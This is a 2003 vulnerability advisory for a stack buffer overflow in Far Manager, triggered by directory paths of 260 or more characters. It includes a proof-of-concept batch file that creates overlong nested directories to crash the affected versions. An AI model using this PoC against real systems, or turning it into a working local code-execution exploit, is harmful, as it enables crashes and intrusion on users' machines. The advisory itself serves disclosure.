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Title:                  Buffer overflow in Far Manager
Affected:               Far Manager 1.70beta1 and prior
                        (saved EIP overflow)
                        1.70beta4
                        (off-by-one frame pointer overflow)
Vendor:                 RARSoft
Risk:                   Average (local code execution)
Exploitable:            Yes
Remote:                 No
Vendor Notified:        January, 30 2003

I. Introduction:

FAR is most convinient console file manager developed by Eugene Roshal

II. Vulnerability.

Stack based overflow occurs on paths >= 260 characters.

III. Details.

NTFS  file system allows to create paths of almost unlimited length. But
Windows  API  does  not  allow  path  longer  than 256 bytes. To prevent
Windows  API  from  checking  requested  path \\?\ prefix may be used to
filename.  This  is documented feature of Windows API. Paths longer than
260  characters  will  cause  FAR to crash. Far 1.70beta4 implements the
check  of  path  length and does not allows to use paths longer than 160
characters.  But due to bug in coding it's still possible to exploit FAR
by  using  path  of  exactly  260  characters  (off-by-one stack pointer
overflow).

IV. Exploit

This  .bat  file demonstrates vulnerability (it creates directory with 2
subdirectories,  first one will cause Far 1.70beta1 to crash, second one
will cause Far 1.70beta4 to crash.

@echo off
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%B%\

V. Vendor

Will be patched in 1.70beta5 than released.

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